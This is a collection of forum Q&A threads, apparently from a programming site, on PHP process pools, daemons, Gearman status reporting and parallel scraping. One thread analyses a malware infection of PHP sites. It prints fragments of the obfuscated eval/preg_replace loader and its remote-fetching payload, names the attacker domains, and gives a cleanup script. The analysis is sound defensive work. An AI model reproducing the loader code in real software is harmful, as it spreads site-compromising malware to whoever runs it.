Linux worker script/queue (PHP)

I need a binary/script (PHP) that does the following.
Start n processes of X in the background and maintain that number of processes.
An example:
n = 50
initially 50 processes are started
a process exits
49 are still running
so 1 should be started again.
P.S.: I posted the same question on SV, which probably makes me very unpopular.

Could you use a Linux crontab and write the current number of processes to a DB or file?
If you use a DB, the advantage is that you can use a stored procedure to lock the table and write the number of processes.
To run the script in the background, add & at the end of the call:
php -f pro.php &
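As a rough illustration of that idea, the cron job could invoke a small PHP supervisor every minute that counts the running workers and starts the missing ones (a sketch; the pro.php worker and the target of 50 come from the question, the path and the ps/grep check are assumptions):
<?php
// supervisor.php - run from cron, e.g.: * * * * * php -f /path/to/supervisor.php
$target = 50;                      // desired number of workers
$worker = '/path/to/pro.php';      // hypothetical path to the worker script
// Count the running instances of the worker
$running = (int) trim(shell_exec("ps ax | grep 'php -f $worker' | grep -v grep | wc -l"));
// Start whatever is missing, detached so cron's shell can exit
for ($i = $running; $i < $target; $i++) {
    exec("nohup php -f $worker > /dev/null 2>&1 &");
}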

Pseudocode:
for (i = 1; i <= 50; i++)
    myprocess
endfor
while true
    while ( $(ps --no-headers -C myprocess | wc -l) < 50 )
        myprocess
    endwhile
endwhile
If you translate this to PHP and fix its flaws, it might just do what you want.
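One possible PHP translation of that pseudocode (a sketch; "myprocess" is the placeholder command from above, and a short sleep is added so the loop does not spin):
<?php
$target = 50;
while (true) {
    // Same check as the pseudocode: how many copies of myprocess are running?
    $running = (int) shell_exec('ps --no-headers -C myprocess | wc -l');
    for ($i = $running; $i < $target; $i++) {
        exec('myprocess > /dev/null 2>&1 &');   // start one more in the background
    }
    sleep(1);   // one flaw in the pseudocode was the tight busy loop
}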

I would go in the direction that Andres suggested. Just put something like this at the top of your pro.php file...
$this_file = __FILE__;
$final_count = 50;
// List all running instances of this script
$processes = `ps auwx | grep "php -f $this_file"`;
$processes = explode("\n", $processes);
// The +3 allows for extra matches such as the grep itself, the shell spawned
// by the backticks, and the trailing empty element left by explode()
if (count($processes) > $final_count + 3) {
    exit;
}
// ... Remaining code goes here

Have you tried making a PHP Daemon before?
http://kevin.vanzonneveld.net/techblog/article/create_daemons_in_php/
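For reference, the bare minimum of daemonizing a PHP script needs only the pcntl and posix extensions; a minimal sketch (error handling, and the second fork some recipes add, are omitted):
<?php
$pid = pcntl_fork();
if ($pid === -1) {
    exit(1);                 // fork failed
} elseif ($pid > 0) {
    exit(0);                 // parent exits, the child keeps running
}
posix_setsid();              // become session leader, detach from the controlling terminal
chdir('/');
umask(0);
// The actual worker loop goes here
while (true) {
    // ... do work ...
    sleep(1);
}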

Here's something in Perl I have in my library (and hey, let's be honest, I'm not going to rig this up in PHP just to give you something working in that language this moment. I'm just using what I can copy / paste).
#!/usr/bin/perl
use threads;
use Thread::Queue;
my @workers;
my $num_threads = shift;
my $dbname = shift;
my $queue = new Thread::Queue;
for (0..$num_threads-1) {
    $workers[$_] = new threads(\&worker);
    print "TEST!\n";
}
while ($_ = shift @ARGV) {
    $queue->enqueue($_);
}
sub worker() {
    while ($file = $queue->dequeue) {
        system('./4parser.pl', $dbname, $file);
    }
}
for (0..$num_threads-1) { $queue->enqueue(undef); }
for (0..$num_threads-1) { $workers[$_]->join; }
Whenever one of those system calls finishes up, it moves on dequeuing. Oh, and damn if I know why I did 0..$num_threads-1 instead of the normal my $i = 0; $i < ... idiom, but I did it that way that time.
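A rough PHP counterpart of that worker pool, using proc_open instead of threads (a sketch; ./4parser.pl and the argument layout are carried over from the Perl version, the rest is assumed):
<?php
// Keep $numWorkers copies of ./4parser.pl running until the file list is drained
$numWorkers = 4;                        // like $num_threads in the Perl version
$dbname     = $argv[1];
$files      = array_slice($argv, 2);    // remaining arguments, like @ARGV
$running    = array();

while ($files || $running) {
    // Top up the pool: start a new process for the next file whenever a slot is free
    while ($files && count($running) < $numWorkers) {
        $file      = array_shift($files);
        $running[] = proc_open('./4parser.pl ' . escapeshellarg($dbname) . ' ' . escapeshellarg($file), array(), $pipes);
    }
    // Reap finished processes so their slots can be reused
    foreach ($running as $k => $proc) {
        $status = proc_get_status($proc);
        if (!$status['running']) {
            proc_close($proc);
            unset($running[$k]);
        }
    }
    usleep(100000);
}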

I have two solutions to propose. Both restart a child process when it exits, reload the child processes on a USR1 signal, wait for the children to exit on SIGTERM, and so on.
The first is based on the swoole PHP extension. It is very performant, async and non-blocking. Here's the usage example code:
<?php
use Symfony\Component\Process\PhpExecutableFinder;
require_once __DIR__.'/../vendor/autoload.php';
$phpBin = (new PhpExecutableFinder)->find();
if (false === $phpBin) {
throw new \LogicException('Php executable could not be found');
}
$daemon = new \App\Infra\Swoole\Daemon();
$daemon->addWorker(1, $phpBin, [__DIR__ . '/console', 'quartz:scheduler', '-vvv']);
$daemon->addWorker(3, $phpBin, [__DIR__ . '/console', 'enqueue:consume', '--setup-broker', '-vvv']);
$daemon->run();
The daemon code is here.
The other is based on the Symfony Process library. It does not require any extra extensions. The usage example and daemon code can be found here.
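As a rough idea of what the Symfony Process variant can look like, here is a sketch (not the linked daemon itself) that keeps three copies of the enqueue:consume command from the example running; signal handling and reloading are omitted:
<?php
use Symfony\Component\Process\Process;

require_once __DIR__.'/../vendor/autoload.php';

$count   = 3;
$command = array('php', __DIR__ . '/console', 'enqueue:consume', '--setup-broker', '-vvv');
$workers = array();

while (true) {
    // Drop workers that have exited...
    $workers = array_filter($workers, function (Process $p) { return $p->isRunning(); });
    // ...and start replacements so $count are always running
    while (count($workers) < $count) {
        $p = new Process($command);
        $p->start();
        $workers[] = $p;
    }
    usleep(200000);
}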

Related

nohup processes keep shutting down

I am trying to run 10,000 processes to create Asterisk phone accounts.
This is to stress-test our Asterisk server.
From PHP I call exec() to run a Linux command:
nohup /usr/src/pjproject-2.3/pjsip-apps/bin/pjsua-x86_64-unknown-linux-gnu --id=sip:%s@13.113.163.3 --registrar=sip:127.0.0.1:25060 --realm=* --username=%s --password=123456 --local-port=%s --null-audio --no-vad --max-calls=32 --no-tcp >>/dev/null 2>>/dev/null & $(echo -ne \'\r\')"
Everything works perfectly and the script does exactly what I expect.
But here comes the next problem: after creating the 10,000 accounts, the processes suddenly all get killed.
Why is this?
Isn't nohup supposed to keep the processes alive?
After calling nohup I also call disown.
Thank you for the help.
[edit]
I also tried this project with screen; the screen approach works like a charm, but the problem is the CPU usage. Creating 10,000 screens makes a Linux server go nuts, which is why I chose nohup.
The full php code:
<?php
# count
$count_screens = 0;
# port count start
$port_count = 30000;
# register accounts number
$ext_number = 1000;
# amount of times you want this loop to go
$min_accounts = 0;
$max_accounts = 1000;

class shell {
    const CREATE_SESSION = 'screen -dmS stress[%s]';
    const RUN_PJSUA = 'screen -S stress[%s] -p 0 -rX stuff "nohup /usr/src/pjproject-2.3/pjsip-apps/bin/pjsua-x86_64-unknown-linux-gnu --id=sip:%s@13.113.163.3 --registrar=sip:127.0.0.1:25060 --realm=* --username=%s --password=123456 --local-port=%s --null-audio --no-vad --max-calls=32 --no-tcp >>/dev/null 2>>/dev/null &"';
    const DISOWN_PJSUA = 'screen -S stress[%s] -p 0 -rX stuff "disown -l $(echo -ne \'\r\')"';

    public function openShell($count_screens) {
        # creating a new screen to make the second call
        $command = sprintf(static::CREATE_SESSION, $count_screens);
        $string = exec($command);
        return var_dump($string);
    }

    public function runPJSUA($count_screens, $ext_number, $port_count) {
        # register a new pjsua client (the extension is used for both --id and --username)
        $command = sprintf(static::RUN_PJSUA, $count_screens, $ext_number, $ext_number, $port_count);
        $string = exec($command);
        usleep(20000);
        return var_dump($string);
    }

    public function disownPJSUA($count_screens) {
        # disown the pjsua client so it survives the screen session
        $command = sprintf(static::DISOWN_PJSUA, $count_screens);
        $string = exec($command);
        return var_dump($string);
    }
}

while ($min_accounts < $max_accounts) {
    $shell = new shell();
    if ($count_screens == 0) {
        $count_screens++;
        echo $shell->openShell($count_screens);
    } else {
        $count_screens = 1;
    }
    $port_count++;
    $ext_number++;
    $min_accounts++;
    echo $shell->runPJSUA($count_screens, $ext_number, $port_count);
    echo $shell->disownPJSUA($count_screens);
}
?>
Pjsua is a relatively heavy application, definitely too heavy to run 10,000 instances of, and not intended for this kind of testing. As you are configuring it for 32 calls, even running out of ports would be a problem (two ports are reserved per call, plus a port for SIP). If you want to stay with pjsua, you might at least optimize the test by configuring multiple accounts for a single pjsua instance. It might be limited by command-line length, but ~30 accounts per instance might work.

Execute every N command in parallel in shell_exec() in PHP

I'd like to execute N commands in bash in parallel, then the next N commands after all of those finish, and then the next N commands, and so on.
Because I am not an expert in shell scripting, I have resorted to PHP, but I suspect my code is not doing what I need optimally:
<?php
// d() is a function like var_dump()
d($d);
$ips = array(
"83.149.70.159:13012" => 8,
"37.48.118.90:13082" => 77,
"83.149.70.159:13082" => 77,);
d($ips);
reset($ips);
$prx = "storm";
$f = array();
foreach ($d as $calln) {
$ip = current($ips);
$ipkey = key($ips);
d($ip, $ipkey);
$comd = choose_comd($prx);
d( $comd);
$f[] = shell_exec($comd);
d($f);
choose_limiting ($prx);
d($GLOBALS['a']);
}
function choose_comd ($prx) {
    d($GLOBALS['calln']);
    switch ($prx) {
        case "storm":
            return "cd /Users/jMac-NEW/HoldingForDO/phub/phubalt_pages && curl -x {$GLOBALS['ipkey']} \"https://catalog.loc.gov/vwebv/search?searchArg={$GLOBALS['calln']}&searchCode=CALL%2B&searchType=1&limitTo=none&fromYear=&toYear=&limitTo=LOCA%3Dall&limitTo=PLAC%3Dall&limitTo=TYPE%3Dall&limitTo=LANG%3Dall&recCount=1200\" >trial_{$GLOBALS['calln']}_out.html 2> trial_{$GLOBALS['calln']}_error.txt &";
        // more cases ...
    }
}
function choose_limiting ($prx){
switch ($prx) {
case "":
if (!next($ips)) {
sleep (80);
reset($ips);
}
case "storm":
if (!isset($GLOBALS['a'])) {
echo "if";
$GLOBALS['a'] = 0;
}
elseif ($GLOBALS['a'] == current($GLOBALS['ips'])) {
echo "elseif";
next($GLOBALS['ips']);
sleep(80/count($GLOBALS['ips']) - 7); // 80 is the standard
$GLOBALS['a'] = 0;
}
else {
echo "else";
$GLOBALS['a']++;
}
}
}
function trying () {
    $GLOBALS['a']++;
    d($GLOBALS['a']);
}
Firstly, I am not sure if running a loop around shell_exec("command… &") will make all the commands run in parallel.
Secondly, the loop runs over all the possible commands, but is made to sleep() for an arbitrary, estimated duration of 70 seconds after every N commands are run with shell_exec(). A 70-second sleep may or may not correspond to the completion of the previous N commands; I am just assuming it will be about right.
May I know whether what I have done fulfils my aim? If not, why? And what other solution is there?
Actually I do not mind just using bash directly, but the problem is that every iteration of the loop is supposed to be fed a variable $calln from a PHP array $d populated in earlier parts of the script (not shown). If PHP can do what I need, please stick to PHP.
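For reference, here is a minimal sketch of the "run N, wait for all of them, run the next N" pattern in PHP using proc_open, relying on the fact that proc_close() blocks until the process exits (the curl command below is a placeholder for the one built in choose_comd()):
<?php
$batchSize = 3;                                      // N commands per batch
foreach (array_chunk($d, $batchSize) as $batch) {    // $d is the array of call numbers
    $procs = array();
    foreach ($batch as $calln) {
        // Placeholder command; substitute the real curl call built in choose_comd()
        $cmd = "curl -s 'https://catalog.loc.gov/vwebv/search?searchArg=$calln' > trial_{$calln}_out.html";
        $procs[] = proc_open($cmd, array(), $pipes);
    }
    // proc_close() waits for each process, so this blocks until the whole batch is done
    foreach ($procs as $p) {
        proc_close($p);
    }
}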

Hacked site - encrypted code

A couple of days ago I noticed that almost all PHP files on my server are infected with some encrypted code, and it is different in almost every file. Here is an example from one of the files:
http://pastebin.com/JtkNya5m
Can anybody tell me what this code does or how to decode it?
You can calculate the values of some of the variables, and begin to get your bearings.
$vmksmhmfuh = 'preg_replace'; //substr($qbrqftrrvx, (44195 - 34082), (45 - 33));
preg_replace('/(.*)/e', $viwdamxcpm, null); // Calls the function wgcdoznijh() $vmksmhmfuh($ywsictklpo, $viwdamxcpm, NULL);
So the initial purpose is to call the wgcdoznijh() function with the payloads in the script; this is done by way of an embedded function call in the preg_replace() subject, triggered by the /e modifier in the expression.
/* aviewwjaxj */ eval(str_replace(chr((257-220)), chr((483-391)), wgcdoznijh($tbjmmtszkv,$qbrqftrrvx))); /* ptnsmypopp */
If you hex decode the result of that you will be just about here:
if ((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) {
$GLOBALS["anuna"] = 1;
function fjfgg($n)
{
return chr(ord($n) - 1);
}
#error_reporting(0);
preg_replace("/(.*)/e", "eval(implode(array_map("fjfgg",str_split("\x25u:f!>!(\x25\x78:!> ...
The above is truncated, but you have another payload as the subject of the new preg_replace() call. Again, due to the /e modifier, it has the potential to execute.
It is using the array_map() callback to further decode the payload, which is then passed to eval().
The payload for eval looks like this (hex decoded):
$t9e = '$w9 ="/(.*)/e";$v9 = #5656}5;Bv5;oc$v5Y5;-4_g#&oc$5;oc$v5Y5;-3_g#&oc$5;oc$v5Y5;-2_g#&oc$5;oc$v5Y5;-1_g#&oc$5;B&oc$5{5-6dtz55}56;%v5;)%6,"n\r\n\r\"(edolpxe&)%6,m$(tsil5;~v5)BV%(6fi5;)J(esolcW#5}5;t$6=.6%5{6))000016,J(daerW&t$(6elihw5;B&%5;)qer$6,J(etirwW5;"n\n\X$6:tsoH"6=.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW#5{6))086,1pi$6,J(tcennocW#!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW#&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi#(pi2gnol#&2pi$5;)X$(emanybXteg#&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5;B=]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap#6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi#&%5;-elif#&cni$5;~v5)~^)"elifj3_z5}5;ser$v5;~v5)BVser$(6fi5;)hc$(esolcQ5;)hc$(cexeQ&ser$5;)06,REDAEH+5;)016,TUOEMIT+5;)16,REFSNARTNRUTER+5;)lru$6,LRU+5;)(tiniQ&hc$5;~v5)~^)"tiniQj2_z555}5;%v5;~v5)BV%(6fi5;-Z#&%5;~v5)~^)"Zj1_z59 |6: |5:""|B: == |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}};eslaf nruter {esle };))8-,i$,ataDzg$(rtsbus(etalfnizg# nruter };2+i$=i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi };nelx$+2+i$=i$ ;))2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi ;))1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe#=1a$ ;)po$,)-$(dtg#(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ;)))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } ;a$~ ;W=a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } ;))po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45#9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *# = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~;t$U&zesleU~;)W%Y%RzesleU~;)W#Y#RU;)v$(oocd=t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|#:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W#; $syv= "eval(str_replace(array"; $siv = "str_replace";$slv = "strrev";$s1v="create_function"; $svv = #//}9;g$^s$9nruter9}9;)8,0,q$(r$=.g$9;))"46x.x?x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x$1\d6x\"=m$;"261'x1x.1x\"=r$;"351xa\07x\"=p$;"651.x%1x&1x\"=l$9{9)q$9,s$(2ne9noitcnuf;}#; $n9 = #1067|416|779|223|361#; $ll = "preg_replace"; $ee1 = array(#\14#,#, $#,#) { #,#[$i]#,#substr($#,#a = $xx("|","#,#,strpos($y,"9")#,# = str_replace($#,#x3#,#\x7#,#\15#,#;$i++) {#,#function #,#x6#,#); #,#for($i=0;$i
Which looks truncated ...
That is as far as I have time for, but if you want to continue you may find the following URL useful.
http://ddecode.com/
Good luck
I found the same code in a WordPress instance and wrote a short script to remove it from all files:
$directory = new RecursiveDirectoryIterator(dirname(__FILE__));
$iterator = new RecursiveIteratorIterator($directory);
foreach ($iterator as $filename => $cur)
{
    $contents = file_get_contents($filename);
    // Infected files start with the injected block: check for the marker string,
    // a minimum length, and the closing "?>" of the injected code at the expected offset
    if (strpos($contents, 'tngmufxact') !== false && strlen($contents) > 13200 && strpos($contents, '?>', 13200) == 13278) {
        echo $filename.PHP_EOL;
        // Keep only what follows the injected block
        file_put_contents($filename, substr($contents, 13280));
    }
}
Just change the string 'tngmufxact' to your obfuscated version and everything will be removed automatically.
Maybe the length of the obfuscated string will differ - don't test this in your live environment!
Be sure to backup your files before executing this!
I've decoded this script and it is (except the obfuscation) exactly the same as this one: Magento Website Hacked - encryption code in all php files
The URLs inside are the same too:
33db9538.com
9507c4e8.com
e5b57288.com
54dfa1cb.com
If you are unsure/inexperienced don't try to execute or decode the code yourself, but get professional help.
Besides that: the decoding was done manually by picking the code pieces and partially executing them (inside a virtual machine - just in case something bad happens).
So basically I've repeated this over and over:
echo the hex strings to get the plain text (to find out which functions get used)
always replace eval with echo
always replace preg_replace("/(.*)/e", ...) with echo(preg_replace("/(.*)/", ...))
The e at the end of the regular expression means evaluate (like the php function eval), so don't forget to remove that too.
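Concretely, the substitutions from those steps look like this (for inspection only, on copies inside a disposable VM; never run the original lines):
// Malicious form (from the top of the infected file):
//   eval(str_replace(chr((257-220)), chr((483-391)), wgcdoznijh($tbjmmtszkv, $qbrqftrrvx)));
// Inspection form - print the decoded stage instead of executing it:
//   echo str_replace(chr((257-220)), chr((483-391)), wgcdoznijh($tbjmmtszkv, $qbrqftrrvx));
//
// Malicious form:   preg_replace("/(.*)/e", $payload, $subject);   // /e evaluates the replacement
// Inspection form:  echo preg_replace("/(.*)/", $payload, $subject);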
In the end you have a few function definitions and one of them gets invoked via ob_start.

determining proper gearman task function to retrieve real-time job status

Very simply, I have a program that needs to perform a large process (anywhere from 5 seconds to several minutes) and I don't want to make my page wait for the process to finish before it loads.
I understand that I need to run this Gearman job as a background process, but I'm struggling to identify the proper solution to get real-time status updates as to when the worker actually finishes the process. I've used the following code snippet from the PHP examples:
do {
    sleep(3);
    $stat = $gmclient->jobStatus($job_handle);
    if (!$stat[0]) // the job is no longer known, so it is done
        $done = true;
    echo "Running: " . ($stat[1] ? "true" : "false") . ", numerator: " . $stat[2] . ", denominator: " . $stat[3] . "\n";
} while (!$done);
echo "done!\n";
This works; however, it appears that it just returns data to the client when the worker has finished telling the job what to do. Instead, I want to know when the literal process of the job has finished.
My real-life example:
Pull several data feeds from an API (some feeds take longer than others)
Load a couple of the ones that always load fast, place a "Waiting/Loading" animation on the section that was sent off to a worker queue
When the work is done and the results have been completely retrieved, replace the animation with the results
This is a bit late, but I stumbled across this question looking for the same answer. I was able to get a solution together, so maybe it will help someone else.
For starters, refer to the documentation on GearmanClient::jobStatus. This will be called from the client, and the function accepts a single argument: $job_handle. You retrieve this handle when you dispatch the request:
$client = new GearmanClient( );
$client->addServer( '127.0.0.1', 4730 );
$handle = $client->doBackground( 'serviceRequest', $data );
Later on, you can retrieve the status by calling the jobStatus function on the same $client object:
$status = $client->jobStatus( $handle );
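Per the GearmanClient::jobStatus documentation, $status is a four-element array; a small sketch of reading it on the client side:
// $status = array(is_known, is_running, numerator, denominator)
list($known, $running, $num, $den) = $client->jobStatus( $handle );
if ( !$known ) {
    echo "Job is finished (or the handle is no longer known)\n";
} elseif ( $den > 0 ) {
    printf( "Progress: %d%%\n", 100 * $num / $den );
}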
This is only meaningful, though, if you actually change the status from within your worker with the sendStatus method:
$worker = new GearmanWorker( );
$worker->addFunction( 'serviceRequest', function( $job ) {
$max = 10;
// Set initial status - numerator / denominator
$job->sendStatus( 0, $max );
for( $i = 1; $i <= $max; $i++ ) {
sleep( 2 ); // Simulate a long running task
$job->sendStatus( $i, $max );
}
return GEARMAN_SUCCESS;
} );
while( $worker->work( ) ) {
$worker->wait( );
}
In versions of Gearman prior to 0.5, you would use the GearmanJob::status method to set the status of a job. Versions 0.6 to current (1.1) use the methods above.
See also this question: Problem With Gearman Job Status

Improving HTML scraper efficiency with pcntl_fork()

With the help of two previous questions, I now have a working HTML scraper that feeds product information into a database. What I am now trying to do is improve efficiency by wrapping my brain around getting my scraper working with pcntl_fork.
If I split my php5-cli script into 10 separate chunks, I improve total runtime by a large factor, so I know I am not I/O or CPU bound but just limited by the linear nature of my scraping functions.
Using code I've cobbled together from multiple sources, I have this working test:
<?php
libxml_use_internal_errors(true);
ini_set('max_execution_time', 0);
ini_set('max_input_time', 0);
set_time_limit(0);
$hrefArray = array("http://slashdot.org", "http://slashdot.org", "http://slashdot.org", "http://slashdot.org");
function doDomStuff($singleHref,$childPid) {
$html = new DOMDocument();
$html->loadHtmlFile($singleHref);
$xPath = new DOMXPath($html);
$domQuery = '//div[@id="slogan"]/h2';
$domReturn = $xPath->query($domQuery);
foreach($domReturn as $return) {
$slogan = $return->nodeValue;
echo "Child PID #" . $childPid . " says: " . $slogan . "\n";
}
}
$pids = array();
foreach ($hrefArray as $singleHref) {
$pid = pcntl_fork();
if ($pid == -1) {
die("Couldn't fork, error!");
} elseif ($pid > 0) {
// We are the parent
$pids[] = $pid;
} else {
// We are the child
$childPid = posix_getpid();
doDomStuff($singleHref,$childPid);
exit(0);
}
}
foreach ($pids as $pid) {
pcntl_waitpid($pid, $status);
}
// Clear the libxml buffer so it doesn't fill up
libxml_clear_errors();
Which raises the following questions:
1) Given my hrefArray contains 4 URLs - if the array were to contain, say, 1,000 product URLs, would this code spawn 1,000 child processes? If so, what is the best way to limit the number of processes to, say, 10, and again with 1,000 URLs as an example, split the child workload to 100 products per child (10 x 100)?
2) I've learned that pcntl_fork creates a copy of the process and all variables, classes, etc. What I would like to do is replace my hrefArray variable with a DOMDocument query that builds the list of products to scrape and then feeds them off to child processes to do the processing - so spreading the load across 10 child workers.
My brain is telling me I need to do something like the following (obviously this doesn't work, so don't run it):
<?php
libxml_use_internal_errors(true);
ini_set('max_execution_time', 0);
ini_set('max_input_time', 0);
set_time_limit(0);
$maxChildWorkers = 10;
$html = new DOMDocument();
$html->loadHtmlFile('http://xxxx');
$xPath = new DOMXPath($html);
$domQuery = '//div[@id="productDetail"]/a';
$domReturn = $xPath->query($domQuery);
foreach ($domReturn as $node) {
    $hrefsArray[] = $node->getAttribute('href');
}
function doDomStuff($singleHref) {
// Do stuff here with each product
}
// To figure out: split the href array into $maxChildWorkers chunks: workArray1, workArray2 ... workArray10.
$pids = array();
foreach ($workArray(1,2,3 ... 10) as $singleHref) {
$pid = pcntl_fork();
if ($pid == -1) {
die("Couldn't fork, error!");
} elseif ($pid > 0) {
// We are the parent
$pids[] = $pid;
} else {
// We are the child
$childPid = posix_getpid();
doDomStuff($singleHref);
exit(0);
}
}
foreach ($pids as $pid) {
pcntl_waitpid($pid, $status);
}
// Clear the libxml buffer so it doesn't fill up
libxml_clear_errors();
But what I can't figure out is how to build my hrefsArray[] in the master/parent process only and feed it to the child processes. Currently everything I've tried causes loops in the child processes, i.e. my hrefsArray gets built in the master and again in each subsequent child process.
I am sure I am going about this all totally wrong, so I would greatly appreciate just a general nudge in the right direction.
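(For what it's worth, the split asked about in question 1 can be done with array_chunk in the parent before forking; a rough sketch, assuming $hrefsArray has already been built in the parent:)
$maxChildWorkers = 10;
$chunks = array_chunk($hrefsArray, (int) ceil(count($hrefsArray) / $maxChildWorkers));
$pids = array();
foreach ($chunks as $chunk) {
    $pid = pcntl_fork();
    if ($pid == -1) {
        die("Couldn't fork, error!");
    } elseif ($pid == 0) {
        // Child: works through its own chunk only, then exits
        foreach ($chunk as $singleHref) {
            doDomStuff($singleHref);
        }
        exit(0);
    }
    $pids[] = $pid;   // parent keeps track of children
}
foreach ($pids as $pid) {
    pcntl_waitpid($pid, $status);
}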
Introduction
pcntl_fork() is not the only way to improve the performance of an HTML scraper. While it might be a good idea to use a message queue, as Charles suggested, you still need a fast, effective way to pull those requests in your workers.
Solution 1
Use curl_multi_init ... cURL is actually faster, and using multi cURL gives you parallel processing.
From PHP DOC
curl_multi_init Allows the processing of multiple cURL handles in parallel.
So instead of using $html->loadHtmlFile('http://xxxx'); to load the files one at a time, you can just use curl_multi_init to load multiple URLs at the same time.
Here are some Interesting Implementations
php - Fastest way to check presence of text in many domains (above 1000)
php get all the images from url which width and height >=200 more quicker
How to prevent server from overloading during Curl requests in PHP
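A minimal curl_multi sketch of that idea (the URL list is a placeholder; each $html string can then be fed to DOMDocument::loadHTML() as before):
<?php
$urls = array('http://example.com/page1', 'http://example.com/page2');  // placeholder list
$mh = curl_multi_init();
$handles = array();
foreach ($urls as $url) {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_multi_add_handle($mh, $ch);
    $handles[$url] = $ch;
}
// Run all transfers in parallel
do {
    curl_multi_exec($mh, $active);
    curl_multi_select($mh);
} while ($active > 0);
foreach ($handles as $url => $ch) {
    $html = curl_multi_getcontent($ch);   // raw HTML, ready for DOMDocument
    curl_multi_remove_handle($mh, $ch);
    curl_close($ch);
}
curl_multi_close($mh);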
Solution 2
You can use pthreads to use multi-threading in PHP
Example
// Number of threads you want
$threads = 10;
// Threads storage
$ts = array();
// Your list of URLS // range just for demo
$urls = range(1, 50);
// Group Urls
$urlsGroup = array_chunk($urls, floor(count($urls) / $threads));
printf("%s:PROCESS #load\n", date("g:i:s"));
$name = range("A", "Z");
$i = 0;
foreach ( $urlsGroup as $group ) {
$ts[] = new AsyncScraper($group, $name[$i ++]);
}
printf("%s:PROCESS #join\n", date("g:i:s"));
// wait for all Threads to complete
foreach ( $ts as $t ) {
$t->join();
}
printf("%s:PROCESS #finish\n", date("g:i:s"));
Output
9:18:00:PROCESS #load
9:18:00:START #5592 A
9:18:00:START #9620 B
9:18:00:START #11684 C
9:18:00:START #11156 D
9:18:00:START #11216 E
9:18:00:START #11568 F
9:18:00:START #2920 G
9:18:00:START #10296 H
9:18:00:START #11696 I
9:18:00:PROCESS #join
9:18:00:START #6692 J
9:18:01:END #9620 B
9:18:01:END #11216 E
9:18:01:END #10296 H
9:18:02:END #2920 G
9:18:02:END #11696 I
9:18:04:END #5592 A
9:18:04:END #11568 F
9:18:04:END #6692 J
9:18:05:END #11684 C
9:18:05:END #11156 D
9:18:05:PROCESS #finish
Class Used
class AsyncScraper extends Thread {
public function __construct(array $urls, $name) {
$this->urls = $urls;
$this->name = $name;
$this->start();
}
public function run() {
printf("%s:START #%lu \t %s \n", date("g:i:s"), $this->getThreadId(), $this->name);
if ($this->urls) {
// Load with CURL
// Parse with DOM
// Do some work
sleep(mt_rand(1, 5));
}
printf("%s:END #%lu \t %s \n", date("g:i:s"), $this->getThreadId(), $this->name);
}
}
It seems like I suggest this daily, but have you looked at Gearman? There's even a well documented PECL class.
Gearman is a work queue system. You'd create workers that connect and listen for jobs, and clients that connect and send jobs. The client can either wait for the requested job to be completed, or it can fire it and forget. At your option, workers can even send back status updates, and how far through the process they are.
In other words, you get the benefits of multiple processes or threads, without having to worry about processes and threads. The clients and workers can even be on different machines.
